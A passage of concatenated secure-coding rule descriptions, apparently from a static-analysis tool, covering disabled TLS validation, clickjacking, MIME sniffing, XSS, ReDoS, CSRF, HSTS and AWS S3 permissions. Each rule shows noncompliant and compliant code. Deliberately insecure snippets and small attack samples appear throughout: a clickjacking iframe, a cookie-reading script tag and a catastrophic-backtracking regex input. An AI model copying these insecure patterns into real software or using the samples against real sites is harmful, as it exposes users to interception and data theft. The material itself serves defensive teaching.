When certificate validation is disabled, the client skips this critical check. This creates an opportunity for attackers to pose as a trusted entity and intercept, manipulate, or steal the data being transmitted.

What is the potential impact?

Establishing trust in a secure way is a non-trivial task. When you disable certificate validation, you are removing a key mechanism designed to build this trust in internet communication, opening your system up to a number of potential threats.

Identity spoofing

If a system does not validate certificates, it cannot confirm the identity of the other party involved in the communication. An attacker can exploit this by creating a fake server and masquerading it as a legitimate one. For example, they might set up a server that looks like your bank’s server, tricking your system into thinking it is communicating with the bank. This scenario, called identity spoofing, allows the attacker to collect any data your system sends to them, potentially leading to significant data breaches.

Loss of data integrity

When TLS certificate validation is disabled, the integrity of the data you send and receive cannot be guaranteed. An attacker could modify the data in transit, and you would have no way of knowing. This could range from subtle manipulations of the data you receive to the injection of malicious code or malware into your system. The consequences of such breaches of data integrity can be severe, depending on the nature of the data and the system.

How to fix it in .NET

Code examples

In the following example, the callback change impacts the entirety of HTTP requests made by the application.

The certificate validation gets disabled by overriding ServerCertificateValidationCallback with an empty implementation. It is highly recommended to use the original implementation.

Noncompliant code example

Imports System.Net

Public Sub Send()
    ServicePointManager.ServerCertificateValidationCallback =
        Function(sender, certificate, chain, errors) True ' Noncompliant

    Dim request As System.Net.HttpWebRequest = System.Net.HttpWebRequest.Create(New System.Uri("https://example.com"))
    request.Method = System.Net.WebRequestMethods.Http.Get
    Dim response As System.Net.HttpWebResponse = request.GetResponse()
    response.Close()
End Sub

How does this work?

Addressing the vulnerability of disabled TLS certificate validation primarily involves re-enabling the default validation.

To avoid running into problems with invalid certificates, consider the following sections.

Using trusted certificates

If possible, always use a certificate issued by a well-known, trusted CA for your server. Most programming environments come with a predefined list of trusted root CAs, and certificates issued by these authorities are validated automatically. This is the best practice, and it requires no additional code or configuration.

Working with self-signed certificates or non-standard CAs

In some cases, you might need to work with a server using a self-signed certificate, or a certificate issued by a CA not included in your trusted roots. Rather than disabling certificate validation in your code, you can add the necessary certificates to your trust store.

Resources

Standards

vbnet:S4036

When executing an OS command and unless you specify the full path to the executable, then the locations in your application’s PATH environment variable will be searched for the executable. That search could leave an opening for an attacker if one of the elements in PATH is a directory under his control.

Ask Yourself Whether

  • The directories in the PATH environment variable may be defined by not trusted entities.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Fully qualified/absolute path should be used to specify the OS command to execute.

Sensitive Code Example

Dim p As New Process()
p.StartInfo.FileName = "binary" ' Sensitive

Compliant Solution

Dim p As New Process()
p.StartInfo.FileName = "C:\Apps\binary.exe" ' Compliant

See

vbnet:S4834

This rule is deprecated, and will eventually be removed.

The access control of an application must be properly implemented in order to restrict access to resources to authorized entities otherwise this could lead to vulnerabilities:

Granting correct permissions to users, applications, groups or roles and defining required permissions that allow access to a resource is sensitive, must therefore be done with care. For instance, it is obvious that only users with administrator privilege should be authorized to add/remove the administrator permission of another user.

Ask Yourself Whether

  • Granted permission to an entity (user, application) allow access to information or functionalities not needed by this entity.
  • Privileges are easily acquired (eg: based on the location of the user, type of device used, defined by third parties, does not require approval …​).
  • Inherited permission, default permission, no privileges (eg: anonymous user) is authorized to access to a protected resource.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

At minimum, an access control system should:

  • Use a well-defined access control model like RBAC or ACL.
  • Entities' permissions should be reviewed regularly to remove permissions that are no longer needed.
  • Respect the principle of least privilege ("an entity has access only the information and resources that are necessary for its legitimate purpose").

Sensitive Code Example

Imports System.Threading
Imports System.Security.Permissions
Imports System.Security.Principal
Imports System.IdentityModel.Tokens

Class SecurityPrincipalDemo
    Class MyIdentity
        Implements IIdentity ' Sensitive, custom IIdentity implementations should be reviewed
    End Class

    Class MyPrincipal
        Implements IPrincipal ' Sensitive, custom IPrincipal implementations should be reviewed
    End Class

    <System.Security.Permissions.PrincipalPermission(SecurityAction.Demand, Role:="Administrators")> ' Sensitive. The access restrictions enforced by this attribute should be reviewed.
    Private Shared Sub CheckAdministrator()
        Dim MyIdentity As WindowsIdentity = WindowsIdentity.GetCurrent() ' Sensitive

        HttpContext.User = ... ' Sensitive: review all reference (set and get) to System.Web HttpContext.User

        Dim domain As AppDomain = AppDomain.CurrentDomain
        domain.SetPrincipalPolicy(PrincipalPolicy.WindowsPrincipal) ' Sensitive

        Dim identity As MyIdentity = New MyIdentity() ' Sensitive
        Dim MyPrincipal As MyPrincipal = New MyPrincipal(MyIdentity) ' Sensitive
        Thread.CurrentPrincipal = MyPrincipal ' Sensitive
        domain.SetThreadPrincipal(MyPrincipal) ' Sensitive

        Dim principalPerm As PrincipalPermission = New PrincipalPermission(Nothing, "Administrators")  ' Sensitive
        principalPerm.Demand()

        Dim handler As SecurityTokenHandler = ...
        Dim identities As ReadOnlyCollection(Of ClaimsIdentity) = handler.ValidateToken()  ' Sensitive, this creates identity
    End Sub

    ' Sensitive: review how this function uses the identity and principal.
    Private Sub modifyPrincipal(ByVal identity As MyIdentity, ByVal principal As MyPrincipal)
    End Sub
End Class

See

typescript:S5732

Clickjacking attacks occur when an attacker try to trick an user to click on certain buttons/links of a legit website. This attack can take place with malicious HTML frames well hidden in an attacker website.

For instance, suppose a safe and authentic page of a social network (https://socialnetworkexample.com/makemyprofilpublic) which allows an user to change the visibility of his profile by clicking on a button. This is a critical feature with high privacy concerns. Users are generally well informed on the social network of the consequences of this action. An attacker can trick users, without their consent, to do this action with the below embedded code added on a malicious website:

<html>
<b>Click on the button below to win 5000$</b>
<br>
<iframe src="https://socialnetworkexample.com/makemyprofilpublic" width="200" height="200"></iframe>
</html>

Playing with the size of the iframe it’s sometimes possible to display only the critical parts of a page, in this case the button of the makemyprofilpublic page.

Ask Yourself Whether

  • Critical actions of the application are prone to clickjacking attacks because a simple click on a link or a button can trigger them.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy frame-ancestors directive which is supported by all modern browsers and will specify the origins of frame allowed to be loaded by the browser (this directive deprecates X-Frame-Options).

Sensitive Code Example

In Express.js application the code is sensitive if the helmet-csp or helmet middleware is used without the frameAncestors directive (or if frameAncestors is set to 'none'):

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'none'"] // Sensitive: frameAncestors  is set to none
    }
  })
);

Compliant Solution

In Express.js application a standard way to implement CSP frame-ancestors directive is the helmet-csp or helmet middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      // other directives
      frameAncestors: ["'example.com'"] // Compliant
    }
  })
);

See

typescript:S5734

MIME confusion attacks occur when an attacker successfully tricks a web-browser to interpret a resource as a different type than the one expected. To correctly interpret a resource (script, image, stylesheet …​) web browsers look for the Content-Type header defined in the HTTP response received from the server, but often this header is not set or is set with an incorrect value. To avoid content-type mismatch and to provide the best user experience, web browsers try to deduce the right content-type, generally by inspecting the content of the resources (the first bytes). This "guess mechanism" is called MIME type sniffing.

Attackers can take advantage of this feature when a website ("example.com" here) allows to upload arbitrary files. In that case, an attacker can upload a malicious image fakeimage.png (containing malicious JavaScript code or a polyglot content file) such as:

<script>alert(document.cookie)</script>

When the victim will visit the website showing the uploaded image, the malicious script embedded into the image will be executed by web browsers performing MIME type sniffing.

Ask Yourself Whether

  • Content-Type header is not systematically set for all resources.
  • Content of resources can be controlled by users.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Implement X-Content-Type-Options header with nosniff value (the only existing value for this header) which is supported by all modern browsers and will prevent browsers from performing MIME type sniffing, so that in case of Content-Type header mismatch, the resource is not interpreted. For example within a <script> object context, JavaScript MIME types are expected (like application/javascript) in the Content-Type header.

Sensitive Code Example

In Express.js application the code is sensitive if, when using helmet, the noSniff middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet({
    noSniff: false, // Sensitive
  })
);

Compliant Solution

When using helmet in an Express.js application, the noSniff middleware should be enabled (it is also done by default):

const express = require('express');
const helmet= require('helmet');

let app = express();

app.use(helmet.noSniff());

See

typescript:S6268

Angular prevents XSS vulnerabilities by treating all values as untrusted by default. Untrusted values are systematically sanitized by the framework before they are inserted into the DOM.

Still, developers have the ability to manually mark a value as trusted if they are sure that the value is already sanitized. Accidentally trusting malicious data will introduce an XSS vulnerability in the application and enable a wide range of serious attacks like accessing/modifying sensitive information or impersonating other users.

Ask Yourself Whether

  • The value for which sanitization has been disabled is user-controlled.
  • It’s difficult to understand how this value is constructed.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Avoid including dynamic executable code and thus disabling Angular’s built-in sanitization unless it’s absolutely necessary. Try instead to rely as much as possible on static templates and Angular built-in sanitization to define web page content.
  • Make sure to understand how the value to consider as trusted is constructed and never concatenate it with user-controlled data.
  • Make sure to choose the correct DomSanitizer "bypass" method based on the context. For instance, only use bypassSecurityTrustUrl to trust urls in an href attribute context.

Sensitive Code Example

import { Component, OnInit } from '@angular/core';
import { DomSanitizer, SafeHtml } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello" [innerHTML]="hello"></div>'
})
export class HelloComponent implements OnInit {
  hello: SafeHtml;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    let name = this.route.snapshot.queryParams.name;
    let html = "<h1>Hello " + name + "</h1>";
    this.hello = this.sanitizer.bypassSecurityTrustHtml(html); // Sensitive
  }
}

Compliant Solution

import { Component, OnInit } from '@angular/core';
import { DomSanitizer } from "@angular/platform-browser";
import { ActivatedRoute } from '@angular/router';

@Component({
  template: '<div id="hello"><h1>Hello {{name}}</h1></div>',
})
export class HelloComponent implements OnInit {
  name: string;

  constructor(private sanitizer: DomSanitizer, private route: ActivatedRoute) { }

  ngOnInit(): void {
    this.name = this.route.snapshot.queryParams.name;
  }
}

See

typescript:S5852

Most of the regular expression engines use backtracking to try all possible execution paths of the regular expression when evaluating an input, in some cases it can cause performance issues, called catastrophic backtracking situations. In the worst case, the complexity of the regular expression is exponential in the size of the input, this means that a small carefully-crafted input (like 20 chars) can trigger catastrophic backtracking and cause a denial of service of the application. Super-linear regex complexity can lead to the same impact too with, in this case, a large carefully-crafted input (thousands chars).

This rule determines the runtime complexity of a regular expression and informs you if it is not linear.

Ask Yourself Whether

  • The input is user-controlled.
  • The input size is not restricted to a small number of characters.
  • There is no timeout in place to limit the regex evaluation time.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

To avoid catastrophic backtracking situations, make sure that none of the following conditions apply to your regular expression.

In all of the following cases, catastrophic backtracking can only happen if the problematic part of the regex is followed by a pattern that can fail, causing the backtracking to actually happen.

  • If you have a repetition r* or r*?, such that the regex r could produce different possible matches (of possibly different lengths) on the same input, the worst case matching time can be exponential. This can be the case if r contains optional parts, alternations or additional repetitions (but not if the repetition is written in such a way that there’s only one way to match it).
  • If you have multiple repetitions that can match the same contents and are consecutive or are only separated by an optional separator or a separator that can be matched by both of the repetitions, the worst case matching time can be polynomial (O(n^c) where c is the number of problematic repetitions). For example a*b* is not a problem because a* and b* match different things and a*_a* is not a problem because the repetitions are separated by a '_' and can’t match that '_'. However, a*a* and .*_.* have quadratic runtime.
  • If the regex is not anchored to the beginning of the string, quadratic runtime is especially hard to avoid because whenever a match fails, the regex engine will try again starting at the next index. This means that any unbounded repetition, if it’s followed by a pattern that can fail, can cause quadratic runtime on some inputs. For example str.split(/\s*,/) will run in quadratic time on strings that consist entirely of spaces (or at least contain large sequences of spaces, not followed by a comma).

In order to rewrite your regular expression without these patterns, consider the following strategies:

  • If applicable, define a maximum number of expected repetitions using the bounded quantifiers, like {1,5} instead of + for instance.
  • Refactor nested quantifiers to limit the number of way the inner group can be matched by the outer quantifier, for instance this nested quantifier situation (ba+)+ doesn’t cause performance issues, indeed, the inner group can be matched only if there exists exactly one b char per repetition of the group.
  • Optimize regular expressions by emulating possessive quantifiers and atomic grouping.
  • Use negated character classes instead of . to exclude separators where applicable. For example the quadratic regex .*_.* can be made linear by changing it to [^_]*_.*

Sometimes it’s not possible to rewrite the regex to be linear while still matching what you want it to match. Especially when the regex is not anchored to the beginning of the string, for which it is quite hard to avoid quadratic runtimes. In those cases consider the following approaches:

  • Solve the problem without regular expressions
  • Use an alternative non-backtracking regex implementations such as Google’s RE2 or node-re2.
  • Use multiple passes. This could mean pre- and/or post-processing the string manually before/after applying the regular expression to it or using multiple regular expressions. One example of this would be to replace str.split(/\s*,\s*/) with str.split(",") and then trimming the spaces from the strings as a second step.
  • It is often possible to make the regex infallible by making all the parts that could fail optional, which will prevent backtracking. Of course this means that you’ll accept more strings than intended, but this can be handled by using capturing groups to check whether the optional parts were matched or not and then ignoring the match if they weren’t. For example the regex x*y could be replaced with x*(y)? and then the call to str.match(regex) could be replaced with matched = str.match(regex) and matched[1] !== undefined.

Sensitive Code Example

The regex evaluation will never end:

/(a+)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Sensitive

Compliant Solution

Possessive quantifiers do not keep backtracking positions, thus can be used, if possible, to avoid performance issues. Unfortunately, they are not supported in JavaScript, but one can still mimick them using lookahead assertions and backreferences:

/((?=(a+))\2)+$/.test(
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"+
"aaaaaaaaaaaaaaa!"
); // Compliant

See

typescript:S5730

A mixed-content is when a resource is loaded with the HTTP protocol, from a website accessed with the HTTPs protocol, thus mixed-content are not encrypted and exposed to MITM attacks and could break the entire level of protection that was desired by implementing encryption with the HTTPs protocol.

The main threat with mixed-content is not only the confidentiality of resources but the whole website integrity:

  • A passive mixed-content (eg: <img src="http://example.com/picture.png">) allows an attacker to access and replace only these resources, like images, with malicious ones that could lead to successful phishing attacks.
  • With active mixed-content (eg: <script src="http://example.com/library.js">) an attacker can compromise the entire website by injecting malicious javascript code for example (accessing and modifying the DOM, steal cookies, etc).

Ask Yourself Whether

  • The HTTPS protocol is in place and external resources are fetched from the website pages.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement content security policy block-all-mixed-content directive which is supported by all modern browsers and will block loading of mixed-contents.

Sensitive Code Example

In Express.js application the code is sensitive if the helmet-csp or helmet middleware is used without the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com']
    } // Sensitive: blockAllMixedContent directive is missing
  })
);

Compliant Solution

In Express.js application a standard way to block mixed-content is to put in place the helmet-csp or helmet middleware with the blockAllMixedContent directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.contentSecurityPolicy({
    directives: {
      "default-src": ["'self'", 'example.com', 'code.jquery.com'],
      blockAllMixedContent: [] // Compliant
    }
  })
);

See

typescript:S5736

HTTP header referer contains a URL set by web browsers and used by applications to track from where the user came from, it’s for instance a relevant value for web analytic services, but it can cause serious privacy and security problems if the URL contains confidential information. Note that Firefox for instance, to prevent data leaks, removes path information in the Referer header while browsing privately.

Suppose an e-commerce website asks the user his credit card number to purchase a product:

<html>
<body>
<form action="/valid_order" method="GET">
Type your credit card number to purchase products:
<input type=text id="cc" value="1111-2222-3333-4444">
<input type=submit>
</form>
</body>

When submitting the above HTML form, a HTTP GET request will be performed, the URL requested will be https://example.com/valid_order?cc=1111-2222-3333-4444 with credit card number inside and it’s obviously not secure for these reasons:

  • URLs are stored in the history of browsers.
  • URLs could be accidentally shared when doing copy/paste actions.
  • URLs can be stolen if a malicious person looks at the computer screen of an user.

In addition to these threats, when further requests will be performed from the "valid_order" page with a simple legitimate embedded script like that:

<script src="https://webanalyticservices_example.com/track">

The referer header which contains confidential information will be send to a third party web analytic service and cause privacy issue:

GET /track HTTP/2.0
Host: webanalyticservices_example.com
Referer: https://example.com/valid_order?cc=1111-2222-3333-4444

Ask Yourself Whether

  • Confidential information exists in URLs.
  • Semantic of HTTP methods is not respected (eg: use of a GET method instead of POST when the state of the application is changed).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

Confidential information should not be set inside URLs (GET requests) of the application and a safe (ie: different from unsafe-url or no-referrer-when-downgrade) referrer-Policy header, to control how much information is included in the referer header, should be used.

Sensitive Code Example

In Express.js application the code is sensitive if the helmet referrerPolicy middleware is disabled or used with no-referrer-when-downgrade or unsafe-url:

const express = require('express');
const helmet = require('helmet');

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer-when-downgrade' // Sensitive: no-referrer-when-downgrade is used
  })
);

Compliant Solution

In Express.js application a secure solution is to user the helmet referrer policy middleware set to no-referrer:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.referrerPolicy({
    policy: 'no-referrer' // Compliant
  })
);

See

typescript:S5739

When implementing the HTTPS protocol, the website mostly continue to support the HTTP protocol to redirect users to HTTPS when they request a HTTP version of the website. These redirects are not encrypted and are therefore vulnerable to man in the middle attacks. The Strict-Transport-Security policy header (HSTS) set by an application instructs the web browser to convert any HTTP request to HTTPS.

Web browsers that see the Strict-Transport-Security policy header for the first time record information specified in the header:

  • the max-age directive which specify how long the policy should be kept on the web browser.
  • the includeSubDomains optional directive which specify if the policy should apply on all sub-domains or not.
  • the preload optional directive which is not part of the HSTS specification but supported on all modern web browsers.

With the preload directive the web browser never connects in HTTP to the website and to use this directive, it is required to submit the concerned application to a preload service maintained by Google.

Ask Yourself Whether

  • The website is accessible with the unencrypted HTTP protocol.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement Strict-Transport-Security policy header, it is recommended to apply this policy to all subdomains (includeSubDomains) and for at least 6 months (max-age=15552000) or even better for 1 year (max-age=31536000).

Sensitive Code Example

In Express.js application the code is sensitive if the helmet or hsts middleware are disabled or used without recommended values:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 3153600, // Sensitive, recommended >= 15552000
  includeSubDomains: false // Sensitive, recommended 'true'
}));

Compliant Solution

In Express.js application a standard way to implement HSTS is with the helmet or hsts middleware:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.hsts({
  maxAge: 31536000,
  includeSubDomains: true
})); // Compliant

See

typescript:S6265

Predefined permissions, also known as canned ACLs, are an easy way to grant large privileges to predefined groups or users.

The following canned ACLs are security-sensitive:

  • PUBLIC_READ, PUBLIC_READ_WRITE grant respectively "read" and "read and write" privileges to anyone, either authenticated or anonymous (AllUsers group).
  • AUTHENTICATED_READ grants "read" privilege to all authenticated users (AuthenticatedUsers group).

Ask Yourself Whether

  • The S3 bucket stores sensitive data.
  • The S3 bucket is not used to store static resources of websites (images, css …​).

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege policy, i.e., to only grant users the necessary permissions for their required tasks. In the context of canned ACL, set it to PRIVATE (the default one), and if needed more granularity then use an appropriate S3 policy.

Sensitive Code Example

All users, either authenticated or anonymous, have read and write permissions with the PUBLIC_READ_WRITE access control:

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PUBLIC_READ_WRITE // Sensitive
});

Compliant Solution

With the PRIVATE access control (default), only the bucket owner has the read/write permissions on the bucket and its ACL.

const s3 = require('aws-cdk-lib/aws-s3');

new s3.Bucket(this, 'bucket', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

new s3deploy.BucketDeployment(this, 'DeployWebsite', {
    accessControl: s3.BucketAccessControl.PRIVATE
});

See

typescript:S5743

By default, web browsers perform DNS prefetching to reduce latency due to DNS resolutions required when an user clicks links from a website page.

For instance on example.com the hyperlink below contains a cross-origin domain name that must be resolved to an IP address by the web browser:

<a href="https://otherexample.com">go on our partner website</a>

It can add significant latency during requests, especially if the page contains many links to cross-origin domains. DNS prefetch allows web browsers to perform DNS resolving in the background before the user clicks a link. This feature can cause privacy issues because DNS resolving from the user’s computer is performed without his consent if he doesn’t intent to go to the linked website.

On a complex private webpage, a combination "of unique links/DNS resolutions" can indicate, to a eavesdropper for instance, that the user is visiting the private page.

Ask Yourself Whether

  • Links to cross-origin domains could result in leakage of confidential information about the user’s navigation/behavior of the website.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement X-DNS-Prefetch-Control header with an off value but this could significantly degrade website performances.

Sensitive Code Example

In Express.js application the code is sensitive if the dns-prefetch-control middleware is disabled or used without the recommended value:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: true // Sensitive: allowing DNS prefetching is security-sensitive
  })
);

Compliant Solution

In Express.js application the dns-prefetch-control or helmet middleware is the standard way to implement X-DNS-Prefetch-Control header:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
  helmet.dnsPrefetchControl({
    allow: false // Compliant
  })
);

See

typescript:S2598

Why is this an issue?

If the file upload feature is implemented without proper folder restriction, it will result in an implicit trust violation within the server, as trusted files will be implicitly stored alongside third-party files that should be considered untrusted.

This can allow an attacker to disrupt the security of an internal server process or the running application.

What is the potential impact?

After discovering this vulnerability, attackers may attempt to upload as many different file types as possible, such as javascript files, bash scripts, malware, or malicious configuration files targeting potential processes.

Below are some real-world scenarios that illustrate the potential impact of an attacker exploiting the vulnerability.

Full application compromise

In the worst-case scenario, the attackers succeed in uploading a file recognized by in an internal tool, triggering code execution.

Depending on the attacker, code execution can be used with different intentions:

  • Download the internal server’s data, most likely to sell it.
  • Modify data, install malware, for instance, malware that mines cryptocurrencies.
  • Stop services or exhaust resources, for instance, with fork bombs.

Server Resource Exhaustion

By repeatedly uploading large files, an attacker can consume excessive server resources, resulting in a denial of service.

If the component affected by this vulnerability is not a bottleneck that acts as a single point of failure (SPOF) within the application, the denial of service can only affect the attacker who caused it.

Even though a denial of service might have little direct impact, it can have secondary impact in architectures that use containers and container orchestrators. For example, it can cause unexpected container failures or overuse of resources.

In some cases, it is also possible to force the product to "fail open" when resources are exhausted, which means that some security features are disabled in an emergency.

These threats are particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

How to fix it in Formidable

Code examples

Noncompliant code example

const Formidable = require('formidable');

const form          = new Formidable(); // Noncompliant
form.uploadDir      = "/tmp/";
form.keepExtensions = true;

Compliant solution

const Formidable = require('formidable');

const form          = new Formidable();
form.uploadDir      = "/uploads/";
form.keepExtensions = false;

How does this work?

Use pre-approved folders

Create a special folder where untrusted data should be stored. This folder should be classified as untrusted and have the following characteristics:

  • It should have specific read and write permissions that belong to the right people or organizations.
  • It should have a size limit or its size should be monitored.
  • It should contain backup copies if it contains data that belongs to users.

This folder should not be located in /tmp, /var/tmp or in the Windows directory %TEMP%.
These folders are usually "world-writable", can be manipulated, and can be accidentally deleted by the system.

Also, the original file names and extensions should be changed to controlled strings to prevent unwanted code from being executed based on the file names.

Resources

typescript:S5742

Certificate Transparency (CT) is an open-framework to protect against identity theft when certificates are issued. Certificate Authorities (CA) electronically sign certificate after verifying the identify of the certificate owner. Attackers use, among other things, social engineering attacks to trick a CA to correctly verifying a spoofed identity/forged certificate.

CAs implement Certificate Transparency framework to publicly log the records of newly issued certificates, allowing the public and in particular the identity owner to monitor these logs to verify that his identify was not usurped.

Ask Yourself Whether

  • The website identity is valuable and well-known, therefore prone to theft.

There is a risk if you answered yes to this question.

Recommended Secure Coding Practices

Implement Expect-CT HTTP header which instructs the web browser to check public CT logs in order to verify if the website appears inside and if it is not, the browser will block the request and display a warning to the user.

Sensitive Code Example

In Express.js application the code is sensitive if the expect-ct middleware is disabled:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(
    helmet({
      expectCt: false // Sensitive
    })
);

Compliant Solution

In Express.js application the expect-ct middleware is the standard way to implement expect-ct. Usually, the deployment of this policy starts with the report only mode (enforce: false) and with a low maxAge (the number of seconds the policy will apply) value and next if everything works well it is recommended to block future connections that violate Expect-CT policy (enforce: true) and greater value for maxAge directive:

const express = require('express');
const helmet = require('helmet');

let app = express();

app.use(helmet.expectCt({
  enforce: true,
  maxAge: 86400
})); // Compliant

See

typescript:S6275

Amazon Elastic Block Store (EBS) is a block-storage service for Amazon Elastic Compute Cloud (EC2). EBS volumes can be encrypted, ensuring the security of both data-at-rest and data-in-transit between an instance and its attached EBS storage. In the case that adversaries gain physical access to the storage medium they are not able to access the data. Encryption can be enabled for specific volumes or for all new volumes and snapshots. Volumes created from snapshots inherit their encryption configuration. A volume created from an encrypted snapshot will also be encrypted by default.

Ask Yourself Whether

  • The disk contains sensitive data that could cause harm when leaked.
  • There are compliance requirements for the service to store data encrypted.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to encrypt EBS volumes that contain sensitive information. Encryption and decryption are handled transparently by EC2, so no further modifications to the application are necessary. Instead of enabling encryption for every volume, it is also possible to enable encryption globally for a specific region. While creating volumes from encrypted snapshots will result in them being encrypted, explicitly enabling this security parameter will prevent any future unexpected security downgrade.

Sensitive Code Example

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-explicit', {
      availabilityZone: 'us-west-2a',
      size: Size.gibibytes(1),
      encrypted: false // Sensitive
    });
import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'unencrypted-implicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
    }); // Sensitive as encryption is disabled by default

Compliant Solution

For aws_cdk.aws_ec2.Volume:

import { Size } from 'aws-cdk-lib';
import { Volume } from 'aws-cdk-lib/aws-ec2';

new Volume(this, 'encrypted-explicit', {
      availabilityZone: 'eu-west-1a',
      size: Size.gibibytes(1),
      encrypted: true
    });

See

typescript:S6270

Resource-based policies granting access to all users can lead to information leakage.

Ask Yourself Whether

  • The AWS resource stores or processes sensitive data.
  • The AWS resource is designed to be private.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to implement the least privilege principle, i.e. to grant necessary permissions only to users for their required tasks. In the context of resource-based policies, list the principals that need the access and grant to them only the required privileges.

Sensitive Code Example

This policy allows all users, including anonymous ones, to access an S3 bucket:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AnyPrincipal()] // Sensitive
}))

Compliant Solution

This policy allows only the authorized users:

import { aws_iam as iam } from 'aws-cdk-lib'
import { aws_s3 as s3 } from 'aws-cdk-lib'

const bucket = new s3.Bucket(this, "ExampleBucket")

bucket.addToResourcePolicy(new iam.PolicyStatement({
    effect: iam.Effect.ALLOW,
    actions: ["s3:*"],
    resources: [bucket.arnForObjects("*")],
    principals: [new iam.AccountRootPrincipal()]
}))

See

typescript:S6249

By default, S3 buckets can be accessed through HTTP and HTTPs protocols.

As HTTP is a clear-text protocol, it lacks the encryption of transported data, as well as the capability to build an authenticated connection. It means that a malicious actor who is able to intercept traffic from the network can read, modify or corrupt the transported content.

Ask Yourself Whether

  • The S3 bucket stores sensitive information.
  • The infrastructure has to comply with AWS Foundational Security Best Practices standard.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

It’s recommended to enforce HTTPS only access by setting enforceSSL property to true

Sensitive Code Example

S3 bucket objects access through TLS is not enforced by default:

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example'); // Sensitive

Compliant Solution

const s3 = require('aws-cdk-lib/aws-s3');

const bucket = new s3.Bucket(this, 'example', {
    bucketName: 'example',
    versioned: true,
    publicReadAccess: false,
    enforceSSL: true
});

See

typescript:S4502

A cross-site request forgery (CSRF) attack occurs when a trusted user of a web application can be forced, by an attacker, to perform sensitive actions that he didn’t intend, such as updating his profile or sending a message, more generally anything that can change the state of the application.

The attacker can trick the user/victim to click on a link, corresponding to the privileged action, or to visit a malicious web site that embeds a hidden web request and as web browsers automatically include cookies, the actions can be authenticated and sensitive.

Ask Yourself Whether

  • The web application uses cookies to authenticate users.
  • There exist sensitive operations in the web application that can be performed when the user is authenticated.
  • The state / resources of the web application can be modified by doing HTTP POST or HTTP DELETE requests for example.

There is a risk if you answered yes to any of those questions.

Recommended Secure Coding Practices

  • Protection against CSRF attacks is strongly recommended:
    • to be activated by default for all unsafe HTTP methods.
    • implemented, for example, with an unguessable CSRF token
  • Of course all sensitive operations should not be performed with safe HTTP methods like GET which are designed to be used only for information retrieval.

Sensitive Code Example

Express.js CSURF middleware protection is not found on an unsafe HTTP method like POST method:

let csrf = require('csurf');
let express = require('express');

let csrfProtection = csrf({ cookie: true });

let app = express();

// Sensitive: this operation doesn't look like protected by CSURF middleware (csrfProtection is not used)
app.post('/money_transfer', parseForm, function (req, res) {
  res.send('Money transferred');
});

Protection provided by Express.js CSURF middleware is globally disabled on unsafe methods:

let csrf = require('csurf');
let express = require('express');

app.use(csrf({ cookie: true, ignoreMethods: ["POST", "GET"] })); // Sensitive as POST is unsafe method

Compliant Solution

